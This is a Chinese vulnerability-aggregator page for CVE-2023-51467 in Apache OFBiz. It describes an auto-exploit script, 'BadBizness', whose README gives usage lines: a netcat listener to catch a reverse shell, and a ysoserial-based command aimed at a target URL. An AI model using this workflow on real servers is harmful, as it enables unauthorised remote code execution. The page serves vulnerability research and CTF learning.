POC详情: fe906ec6c9bbd848d8ddbc1e9f0e20e66820820c

来源
关联漏洞
标题: Apache OFBiz 代码问题漏洞 (CVE-2023-51467)
描述:Apache OFBiz是美国阿帕奇(Apache)基金会的一套企业资源计划(ERP)系统。该系统提供了一整套基于Java的Web应用程序组件和工具。 Apache OFBiz 18.12.11之前版本存在代码问题漏洞,该漏洞源于允许攻击者绕过身份验证来实现服务器端请求伪造。
描述
Auto exploit script for the Java web framework OF Biz under CVE-2023-51467. 
介绍
![banner](badbiz.png)

# BadBizness
Automatic exploitation script for the Java web framework [OF Biz](https://ofbiz.apache.org/) under CVE-2023-51467. Inspired by the HackTheBox machine [Bizness](https://app.hackthebox.com/machines/582).

## Usage and Example
This script requires the tool [ysoserial](https://github.com/frohoff/ysoserial/releases) and OpenJDK version 11. See usage menu for installation.

Setup a listener to catch the shell with your preferred method. Here is a netcat example:
```
nc -nlvp 1337
```
Execute the script:
```
python3 badbizness.py [path to ysoserial-all.jar] [TARGET BASE URL] [LISTENER IP] [LISTENER PORT]

python3 badbizness.py /home/twopoint/ysoserial-all.jar http://example.com:1337 10.10.10.10. 1337
```
## Disclaimer and Credit
This tool was meant as a way to learn more about Python. I credit [this](https://github.com/abdoghazy2015/ofbiz-CVE-2023-49070-RCE-POC) script for helping me thoroughly.
文件快照

[4.0K] /data/pocs/fe906ec6c9bbd848d8ddbc1e9f0e20e66820820c ├── [4.0K] badbizness.py ├── [ 40K] badbiz.png └── [ 938] README.md 0 directories, 3 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。